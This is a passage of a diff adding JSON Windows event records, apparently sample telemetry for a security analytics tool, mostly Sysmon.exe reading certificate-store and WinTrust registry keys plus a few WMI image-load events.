"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481050000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clusapi.dll", + "image_path": "C:\\Windows\\System32\\clusapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 